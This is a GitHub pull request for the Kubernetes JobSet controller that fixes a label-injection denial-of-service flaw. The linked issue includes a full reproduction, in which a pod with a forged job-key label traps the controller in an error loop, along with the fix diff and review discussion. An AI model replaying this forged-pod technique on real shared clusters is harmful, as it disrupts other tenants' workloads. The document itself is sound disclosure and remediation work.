### PR TITLE
Filter out Pods that do not have the same owner reference

### LINKED ISSUE #1153: JobSet PodReconciler Label Injection Leading to Controller DoS Attack
# JobSet PodReconciler Label Injection Leading to Controller DoS Attack

This vulnerability exists in the PodReconciler component of the Kubernetes JobSet controller, allowing a low-privileged attacker with only `create pods` permission to cause a denial of service attack in multi-tenant shared namespace scenarios by creating a malicious pod with a forged `job-key` label, causing the JobSet controller to enter an infinite error loop. The root cause is the lack of OwnerReference validation when processing pods, leading the controller to mistakenly treat the attacker's pod as part of the victim's JobSet (Confused Deputy). Recommended CWE classifications: CWE-441 (Unintended Proxy or Intermediary) and CWE-400 (Uncontrolled Resource Consumption).

credit for:
@b0b0haha (603571786@qq.com)
@moyushui (dlwjc0713@163.com)
@j311yl0v3u (2439839508@qq.com)

## Summary

JobSet PodReconciler processes pods based solely on the `job-key` label without validating OwnerReference. An attacker with only `create pods` permission can inject a malicious pod with a forged `job-key` label, causing the controller to enter an infinite error loop and resulting in denial of service.

## Kubernetes Version

- Kubernetes: v1.35.0
- Distribution: kind v0.31.0

## Component Version

- JobSet: v0.10.1
- Affected Component: `pkg/controllers/pod_controller.go`

#### Step 1: Install kind and kubectl

```bash
# Install kind v0.31.0
$ curl -Lo /tmp/kind https://kind.sigs.k8s.io/dl/v0.31.0/kind-linux-amd64
$ chmod +x /tmp/kind
$ sudo mv /tmp/kind /usr/local/bin/kind

# Verify installation
$ kind version
kind v0.31.0 go1.25.5 linux/amd64

$ kubectl version --client
Client Version: v1.34.2
```

#### Step 2: Create kind cluster with Kubernetes v1.35.0

```bash
# Create cluster configuration
$ cat > kind-cluster.yaml << EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
EOF

# Create cluster
$ kind create cluster --name jobset-vul --config kind-cluster.yaml --image kindest/node:v1.35.0
Creating cluster "jobset-vul" ...
 ✓ Ensuring node image (kindest/node:v1.35.0) 🖼
 ✓ Preparing nodes 📦 📦
 ✓ Writing configuration 📜
 ✓ Starting control-plane 🕹️
 ✓ Installing CNI 🔌
 ✓ Installing StorageClass 💾
 ✓ Joining worker nodes 🚜
Set kubectl context to "kind-jobset-vul"

# Verify cluster
$ kubectl get nodes -o wide
NAME                       STATUS   ROLES           AGE   VERSION
jobset-vul-control-plane   Ready    control-plane   1m    v1.35.0
jobset-vul-worker          Ready    <none>          1m    v1.35.0
```

#### Step 3: Install JobSet controller v0.10.1

```bash
# Install JobSet controller
$ kubectl apply --server-side -f https://github.com/kubernetes-sigs/jobset/releases/download/v0.10.1/manifests.yaml
namespace/jobset-system serverside-applied
customresourcedefinition.apiextensions.k8s.io/jobsets.jobset.x-k8s.io serverside-applied
serviceaccount/jobset-controller-manager serverside-applied
...

# Wait for controller to be ready
$ kubectl -n jobset-system wait --for=condition=ready pod -l control-plane=controller-manager --timeout=120s
pod/jobset-controller-manager-58f9f5c8c4-px4zk condition met

# Verify controller version
$ kubectl -n jobset-system get deploy jobset-controller-manager -o yaml | grep image:
image: gcr.io/k8s-staging-jobset/jobset:v0.10.1
```

#### Step 1: Create verification namespace

```bash
$ kubectl create ns jobset-vul01
namespace/jobset-vul01 created
```

#### Step 2: Deploy victim JobSet

Create a victim JobSet with 2 pods (1 leader + 1 follower):

```bash
$ cat > victim-jobset.yaml << 'EOF'
apiVersion: jobset.x-k8s.io/v1alpha2
kind: JobSet
metadata:
  name: jobset-vul01
  annotations:
    alpha.jobset.sigs.k8s.io/exclusive-topology: kubernetes.io/hostname
spec:
  replicatedJobs:
  - name: workers
    replicas: 1
    template:
      spec:
        completions: 2
        parallelism: 2
        backoffLimit: 0
        completionMode: Indexed
        template:
          spec:
            restartPolicy: Never
            containers:
            - name: sleep
              image: busybox
              command: ["sh", "-c", "echo start; sleep 3600"]
EOF

$ kubectl apply -n jobset-vul01 -f victim-jobset.yaml
jobset.jobset.x-k8s.io/jobset-vul01 created

# Wait for pods to be running
$ kubectl get pods -n jobset-vul01 -o wide
NAME                             READY   STATUS    RESTARTS   AGE   IP           NODE
jobset-vul01-workers-0-0-cmd6n   1/1     Running   0          30s   10.244.1.3   jobset-vul-worker
jobset-vul01-workers-0-1-j2vhv   1/1     Running   0          29s   10.244.1.4   jobset-vul-worker
```

Both pods are successfully running on the `jobset-vul-worker` node.

#### Step 3: Extract victim's job-key

The `job-key` is calculated as `sha1("namespace/jobName")`, where jobName = `<jobsetName>-<replicatedJobName>-<jobIndex>`.

```bash
# Get leader pod name
$ LEADER_POD=$(kubectl get pod -n jobset-vul01 -l jobset.sigs.k8s.io/jobset-name=jobset-vul01 -o jsonpath='{.items[0].metadata.name}')
$ echo "Leader pod: $LEADER_POD"
Leader pod: jobset-vul01-workers-0-0-cmd6n

# Extract job-key from leader pod label
$ JOB_KEY=$(kubectl get pod -n jobset-vul01 "$LEADER_POD" -o jsonpath='{.metadata.labels.jobset\.sigs\.k8s\.io/job-key}')
$ echo "Job key: $JOB_KEY"
Job key: 0066e01c4f5740ab1846bf47f34b4ef260411665

# Verify job-key calculation
$ echo -n "jobset-vul01/jobset-vul01-workers-0" | sha1sum | awk '{print $1}'
0066e01c4f5740ab1846bf47f34b4ef260411665
```

#### Step 4: Create attacker with minimal permissions

Create an attacker ServiceAccount with only `create pods` permission:

```bash
$ cat > attacker-rbac.yaml << 'EOF'
apiVersion: v1
kind: ServiceAccount
metadata:
  name: attacker
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: attacker-create-pods-only
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["create", "get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: attacker-create-pods-only
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: attacker-create-pods-only
subjects:
- kind: ServiceAccount
  name: attacker
EOF

$ kubectl apply -n jobset-vul01 -f attacker-rbac.yaml
serviceaccount/attacker created
role.rbac.authorization.k8s.io/attacker-create-pods-only created
rolebinding.rbac.authorization.k8s.io/attacker-create-pods-only created

# Verify permission boundary
$ kubectl auth can-i create pods -n jobset-vul01 --as system:serviceaccount:jobset-vul01:attacker
yes

$ kubectl auth can-i delete pods -n jobset-vul01 --as system:serviceaccount:jobset-vul01:attacker
no
```

**Key Evidence**: The attacker can only create pods, not delete them.

#### Step 5: Deploy attacker's malicious pod

Create the attacker's malicious pod using the victim's `job-key` label:

```bash
$ cat > attacker-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: attacker-fake-follower
  labels:
    jobset.sigs.k8s.io/job-key: "$JOB_KEY"
  annotations:
    alpha.jobset.sigs.k8s.io/exclusive-topology: kubernetes.io/hostname
spec:
  restartPolicy: Never
  nodeSelector:
    kubernetes.io/hostname: "non-existing-node"
  containers:
  - name: sleep
    image: busybox
    command: ["sh", "-c", "echo attacker; sleep 3600"]
EOF

# Deploy as attacker (with only create pods permission)
$ kubectl apply -n jobset-vul01 -f attacker-pod.yaml --as system:serviceaccount:jobset-vul01:attacker
pod/attacker-fake-follower created

# Verify attacker pod status
$ kubectl get pods -n jobset-vul01 -o wide
NAME                             READY   STATUS    RESTARTS   AGE   IP           NODE
attacker-fake-follower           0/1     Pending   0          10s   <none>       <none>
jobset-vul01-workers-0-0-cmd6n   1/1     Running   0          3m    10.244.1.3   jobset-vul-worker
jobset-vul01-workers-0-1-j2vhv   1/1     Running   0          3m    10.244.1.4   jobset-vul-worker
```

The attacker's pod is in Pending state (because the node doesn't exist), but it has been successfully created.

#### Step 6: Verify attacker pod is included in job-key query

```bash
$ kubectl get pods -n jobset-vul01 -l jobset.sigs.k8s.io/job-key=$JOB_KEY
NAME                             READY   STATUS    RESTARTS   AGE
attacker-fake-follower           0/1     Pending   0          20s
jobset-vul01-workers-0-0-cmd6n   1/1     Running   0          3m10s
jobset-vul01-workers-0-1-j2vhv   1/1     Running   0          3m9s
```

**Key Evidence**: The attacker's pod has successfully infiltrated the victim JobSet's pod list!

#### Step 7: Trigger controller reconciliation

```bash
$ kubectl label pod -n jobset-vul01 "$LEADER_POD" vul01-trigger=$(date +%s) --overwrite
pod/jobset-vul01-workers-0-0-cmd6n labeled
```

### Expected Result

The controller should enter an error loop, continuously attempting to reconcile but failing.

#### Result 1: Controller enters error loop (DoS attack successful)

```bash
$ kubectl -n jobset-system logs deploy/jobset-controller-manager -c manager --tail=50 | grep -A 2 "jobset-vul01"
```

**Actual Log Evidence** (from controller-logs.txt):

```
2026-01-25T13:04:45Z  LEVEL(-2)  Reconciling Pod  {"controller": "pod", "Pod": {"name":"jobset-vul01-workers-0-0-cmd6n","namespace":"jobset-vul01"}}
2026-01-25T13:04:45Z  ERROR  validating pod placements  {"error": "follower topology \"non-existing-node\" != leader topology \"jobset-vul-worker\""}
2026-01-25T13:04:45Z  ERROR  Reconciler error  {"error": "follower topology \"non-existing-node\" != leader topology \"jobset-vul-worker\""}

2026-01-25T13:04:45Z  LEVEL(-2)  Reconciling Pod  {"controller": "pod", "Pod": {"name":"jobset-vul01-workers-0-0-cmd6n","namespace":"jobset-vul01"}}
2026-01-25T13:04:45Z  ERROR  validating pod placements  {"error": "follower topology \"non-existing-node\" != leader topology \"jobset-vul-worker\""}
2026-01-25T13:04:45Z  ERROR  Reconciler error  {"error": "follower topology \"non-existing-node\" != leader topology \"jobset-vul-worker\""}
```

The controller continuously retries reconciliation, failing each time due to topology validation errors. This proves:

1. **Confused Deputy**: The controller treats the attacker's pod as part of the victim's JobSet
2. **DoS Attack**: The controller is stuck in an error loop, consuming resources and potentially affecting other JobSets
3. **Missing OwnerReference Validation**: The controller doesn't verify whether the pod actually belongs to the JobSet

#### Result 2: Victim pods remain running (current version behavior)

```bash
$ kubectl get pods -n jobset-vul01 -o wide
NAME                             READY   STATUS    RESTARTS   AGE   IP           NODE
attacker-fake-follower           0/1     Pending   0          5m    <none>       <none>
jobset-vul01-workers-0-0-cmd6n   1/1     Running   0          8m    10.244.1.3   jobset-vul-worker
jobset-vul01-workers-0-1-j2vhv   1/1     Running   0          8m    10.244.1.4   jobset-vul-worker
```

In the current version (v0.10.1), due to error handling logic issues, the victim's follower pods were not deleted. However, this doesn't mean the vulnerability doesn't exist:

1. The controller does include the attacker's pod in its processing (Confused Deputy)
2. The controller is stuck in an error loop (DoS attack)
3. If the error handling logic were slightly different, follower pods could be deleted

### Source Code Location

**Vulnerable function: `listPodsForJob`** (`pkg/controllers/pod_controller.go:164-170`)

```go
func (r *PodReconciler) listPodsForJob(ctx context.Context, ns, jobKey string) (*corev1.PodList, error) {
    var podList corev1.PodList
    if err := r.List(ctx, &podList, client.InNamespace(ns), &client.MatchingFields{podJobKey: jobKey}); err != nil {
        return nil, err
    }
    return &podList, nil
}
```

This function queries pods based solely on the `job-key` label, without validating:
- Whether the pod's OwnerReference points to the correct Job
- Whether the pod was created by the JobSet controller

**Error handling causing DoS** (`pkg/controllers/pod_controller.go:150-158`)

```go
valid, err := r.validatePodPlacements(ctx, &leaderPod, podList)
if err != nil {
    log.Error(err, "validating pod placements")
    return ctrl.Result{}, err  // Returns error causing infinite retry
}
if !valid {
    log.V(2).Info(fmt.Sprintf("deleting follower pods for leader pod: %s", leaderPod.Name))
    return ctrl.Result{}, r.deleteFollowerPods(ctx, podList.Items)
}
```

When topology validation fails, `validatePodPlacements` returns an error, causing reconciliation to fail and continuously retry, resulting in DoS.

### Evidence Files

1. `victim-jobset.yaml` - Victim JobSet configuration
2. `attacker-rbac.yaml` - Attacker RBAC configuration (only create pods permission)
3. `attacker-pod.yaml` - Attacker's forged pod configuration
4. `pods-state.yaml` - Pod state snapshot after attack
5. `controller-logs.txt` - Controller logs (showing error loop)
6. `events.txt` - Kubernetes event logs

### Confidentiality

No direct impact. The attacker cannot read sensitive data.

### Integrity

Medium impact. Although the current version doesn't delete pods due to error handling logic issues:
- The controller's normal functionality is disrupted
- If the code logic changes slightly, victim pods could be deleted

### Availability

High impact. The attacker can:
- Cause the JobSet controller to enter an error loop, consuming resources
- Block normal reconciliation of victim JobSets
- Continuously disrupt other tenants' workloads in multi-tenant environments
- Cause high-cost damage in GPU/large-scale training scenarios

### Attack Scenario

**Scenario 1: Multi-tenant shared namespace**
- Multiple teams share the same namespace to run JobSet workloads
- The attacker only needs `create pods` permission (typically a basic permission)
- The attacker can continuously disrupt other teams' training/batch processing jobs
- In GPU clusters, this type of DoS is equivalent to high-cost sabotage

**Scenario 2: Cloud provider managed environment**
- In managed Kubernetes environments, DoS attacks may result in additional billing costs
- Controller resources are consumed, affecting all JobSets in the cluster

### Severity Assessment

- **CVSS Base Score**: 6.5 (Medium)
- **Attack Vector**: Network (AV:N)
- **Attack Complexity**: Low (AC:L)
- **Privileges Required**: Low (PR:L) - Only requires create pods permission
- **User Interaction**: None (UI:N)
- **Scope**: Unchanged (S:U)
- **Confidentiality**: None (C:N)
- **Integrity**: Low (I:L)
- **Availability**: High (A:H)

### Temporary Workaround

1. **Restrict pod creation permissions**: Strictly control `create pods` permission in multi-tenant environments
2. **Use PodSecurity policies**: Limit labels and annotations that pods can use
3. **Monitor anomalous pods**: Monitor pods without OwnerReference but with `job-key` labels

#### Fix 1: Add OwnerReference validation

Add validation in `listPodsForJob` or `validatePodPlacements`:

```go
func (r *PodReconciler) listPodsForJob(ctx context.Context, ns, jobKey string, expectedOwner types.UID) (*corev1.PodList, error) {
    var podList corev1.PodList
    if err := r.List(ctx, &podList, client.InNamespace(ns), &client.MatchingFields{podJobKey: jobKey}); err != nil {
        return nil, err
    }

    // Filter pods that actually belong to this Job
    var filteredPods []corev1.Pod
    for _, pod := range podList.Items {
        if hasOwnerReference(&pod, expectedOwner) {
            filteredPods = append(filteredPods, pod)
        }
    }

    return &corev1.PodList{Items: filteredPods}, nil
}
```

#### Fix 2: Improve error handling

Treat topology validation failure as a normal condition rather than an error:

```go
valid, err := r.validatePodPlacements(ctx, &leaderPod, podList)
if err != nil {
    // Only return error for actual errors
    log.Error(err, "error during pod placement validation")
    return ctrl.Result{}, err
}
if !valid {
    // Topology mismatch is expected, delete follower pods and return success
    log.V(2).Info(fmt.Sprintf("deleting follower pods for leader pod: %s", leaderPod.Name))
    return ctrl.Result{}, r.deleteFollowerPods(ctx, podList.Items)
}
```

#### Fix 3: Add audit logging

Log all processed pods to facilitate anomaly detection:

```go
for _, pod := range podList.Items {
    if !hasOwnerReference(&pod, expectedOwner) {
        log.Info("WARNING: Pod with matching job-key but no owner reference",
                 "pod", pod.Name, "jobKey", jobKey)
    }
}
```

## References

- JobSet GitHub: https://github.com/kubernetes-sigs/jobset
- Affected versions: v0.10.1 and earlier
- CWE-441: Unintended Proxy or Intermediary (Confused Deputy)
- CWE-400: Uncontrolled Resource Consumption (DoS)

## Credits

Discovered and verified by: @b0b0hahha(603571786@qq.com)
Verification Date: 2026-01-25

### Confidentiality

No direct impact. The attacker cannot read sensitive data.

### Integrity

Medium impact. Although the current version doesn't delete pods due to error handling logic issues:
- The controller's normal functionality is disrupted
- If the code logic changes slightly, victim pods could be deleted

### Availability

High impact. The attacker can:
- Cause the JobSet controller to enter an error loop, consuming resources
- Block normal reconciliation of victim JobSets
- Continuously disrupt other tenants' workloads in multi-tenant environments
- Cause high-cost damage in GPU/large-scale training scenarios

### Attack Scenario

**Scenario 1: Multi-tenant shared namespace**
- Multiple teams share the same namespace to run JobSet workloads
- The attacker only needs `create pods` permission (typically a basic permission)
- The attacker can continuously disrupt other teams' training/batch processing jobs
- In GPU clusters, this type of DoS is equivalent to high-cost sabotage

**Scenario 2: Cloud provider managed environment**
- In managed Kubernetes environments, DoS attacks may result in additional billing costs
- Controller resources are consumed, affecting all JobSets in the cluster

### Severity Assessment

- **CVSS Base Score**: 6.5 (Medium)
- **Attack Vector**: Network (AV:N)
- **Attack Complexity**: Low (AC:L)
- **Privileges Required**: Low (PR:L) - Only requires create pods permission
- **User Interaction**: None (UI:N)
- **Scope**: Unchanged (S:U)
- **Confidentiality**: None (C:N)
- **Integrity**: Low (I:L)
- **Availability**: High (A:H)

### PR DESCRIPTION
**Pull request by GiuseppeTT**
#### What type of PR is this?

/kind bug

#### What this PR does / why we need it:

Fix vulnerability in the Pod controller. See #1153 for context.

#### Which issue(s) this PR fixes:

Fixes #1153

#### Does this PR introduce a user-facing change?

```release-note
Fix vulnerability in the Pod controller.
```

### CODE REVIEW

**Comment by GiuseppeTT** [comment]
/assign @ahg-g 

@b0b0haha could you also review?

File: pkg/controllers/pod_controller.go [hunk 1]
```diff
@@ -139,7 +139,16 @@ func (r *PodReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.R
 	if !exists {
 		return ctrl.Result{}, fmt.Errorf("job key label not found on leader pod: %q", leaderPod.Name)
 	}
-	podList, err := r.listPodsForJob(ctx, leaderPod.Namespace, jobKey)
+
+	// For security, only reconcile pods that have the same controller owner as the leader pod.
+	// This prevents an attacker with 'create pods' permission from injecting a pod with a
```
Comment (imreddy13) [inline pkg/controllers/pod_controller.go]: Do we need to mention this? You could just say this results in the controller crash looping with an error.

Comment (GiuseppeTT) [reply pkg/controllers/pod_controller.go]: I mean. Both things are true. The loop fails and it's a security issue. But the main motivation of this change is the security part.

Comment (ahg-g) [reply pkg/controllers/pod_controller.go]: Not just for security reasons, this is simply the right thing to do. I would not mention this.

File: pkg/controllers/pod_controller.go [hunk 2]
```diff
@@ -159,14 +168,29 @@ func (r *PodReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.R
...
-// listPodsForJobKey returns a list of pods owned by a specific job, using the
+// listPodsForJob returns a list of pods owned by a specific job, using the
 // jobKey (SHA1 hash of the namespaced job name) label selector.
-func (r *PodReconciler) listPodsForJob(ctx context.Context, ns, jobKey string) (*corev1.PodList, error) {
+// For security, we filter the pods to only include those that have the same
+// controller owner UID as the leader pod.
+func (r *PodReconciler) listPodsForJob(ctx context.Context, ns, jobKey string, ownerUID types.UID) (*corev1.PodList, error) {
+	log := ctrl.LoggerFrom(ctx)
 	var podList corev1.PodList
 	if err := r.List(ctx, &podList, client.InNamespace(ns), &client.MatchingFields{podJobKey: jobKey}); err != nil {
```
Comment (ahg-g) [inline pkg/controllers/pod_controller.go:173]: did you check if there is a list filter to filter by owner id instead of do it explicitly below?

Comment (ahg-g) [reply pkg/controllers/pod_controller.go:173]: probably using a FieldSelector on `metadata.ownerReferences.uid`

Comment (GiuseppeTT) [reply pkg/controllers/pod_controller.go:173]: I checked the code. I don't think it is supported.

An alternative is to setup a custom index for the owner UID like in `podJobKey: jobKey`. I thought about doing it, but filtering in the loop seemed like a better solution because it can warn of the attack. I am happy with either solution.

File: pkg/controllers/pod_controller.go (hunk 1 above)
Comment (GiuseppeTT) [reply pkg/controllers/pod_controller.go]: I removed the comments.
